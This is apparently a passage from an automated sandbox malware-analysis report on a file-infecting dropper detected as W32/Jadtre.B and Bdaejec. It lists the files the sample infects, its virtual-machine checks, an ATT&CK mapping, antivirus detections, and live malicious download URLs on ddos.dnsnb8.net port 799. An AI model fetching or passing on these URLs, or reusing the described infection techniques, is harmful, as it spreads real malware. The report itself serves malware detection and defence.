Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0040740B push 00436788h; ret	1_2_00407417
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00403818 push 00407F45h; ret	1_2_00403844
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00406418 push 00409DE9h; ret	1_2_00406428
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00401C1D push 00430E02h; ret	1_2_00401C56
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00401C1F push 00430E02h; ret	1_2_00401C56
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00402C2E push 0041D9C4h; ret	1_2_00402C4D
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00439439 push 0041340Eh; ret	1_2_0043D062
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0040C8CA push 00407821h; ret	1_2_0040C8CF
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_004074EE push 0042BE47h; ret	1_2_004074F4
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_004048F8 push 00404966h; ret	1_2_00404908
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_004158FE push 00420E3Ch; ret	1_2_00415907
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00405098 push ecx; ret	1_2_0040509B
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_004018B1 push 0040CC1Bh; ret	1_2_004018BD
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_004054B4 push 004294D3h; ret	1_2_004054CD
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0040CD41 push 00409805h; ret	1_2_0040CD5E
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00402142 push 0043780Dh; ret	1_2_00402BD0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00407542 push 0042086Ch; ret	1_2_00407564
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00405145 push 00413471h; ret	1_2_00405159
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00402548 push 0042B124h; ret	1_2_0040254E
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00403156 push 0042FB70h; ret	1_2_00403163
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_00402163 push 0040E9AFh; ret	1_2_0042FDA6
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0041A96D push 0041AC46h; ret	1_2_0041A976
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0041357E push 0042DAAFh; ret	1_2_004135B1
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 1_2_0040217F push 0040D680h; ret	1_2_00402184

Source: biKy3nZEyJ.exe	Static PE information: section name: A#uq entropy: 6.934503720718857
Source: TJytnf.exe.1.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.5.dr	Static PE information: section name: EpNuZ entropy: 6.934594543260334
Source: MyProg.exe.5.dr	Static PE information: section name: Y\|uR entropy: 6.934093080731921
Source: SciTE.exe.5.dr	Static PE information: section name: u entropy: 6.934667299067817

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	File created: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 799

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_5-1062

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

API coverage: 9.4 %

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F71718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00F71754h

5_2_00F71718

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F729E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

5_2_00F729E2

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F72B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

5_2_00F72B8C

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

API call chain: ExitProcess graph end node

graph_5-1037

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

Code function: 1_2_00740044 mov eax, dword ptr fs:[00000030h]

1_2_00740044

Source: SciTE.exe.5.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

Code function: 1_2_004035A2 cpuid

1_2_004035A2

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F71718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

5_2_00F71718

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 5_2_00F7139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

5_2_00F7139F

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: TJytnf.exe PID: 3044, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: TJytnf.exe PID: 3044, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	13 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
biKy3nZEyJ.exe	100%	Avira	W32/Jadtre.B
biKy3nZEyJ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\TJytnf.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\TJytnf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar?	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://ddos.dnsnb8.net/ava	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rarC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarmples	100%	Avira URL Cloud	malware
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar%	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar86)	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rars	100%	Avira URL Cloud	phishing
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarp	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net/Pt	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar0	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarp	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarbC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar%	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar(	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k2.rar	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net/ava	TJytnf.exe, 00000005.00000002.1847735199.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar?	TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarmples	TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar86)	TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.activestate.com	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rars	TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarC:	TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	TJytnf.exe, 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmp, TJytnf.exe, 00000005.00000003.1270045728.0000000001360000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.5.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar%	TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarp	TJytnf.exe, 00000005.00000002.1848086577.000000000309A000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.baanboard.comBrendon	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://www.scintilla.org	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net/Pt	TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://www.develop.com	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.com	SciTE.exe.5.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar0	TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
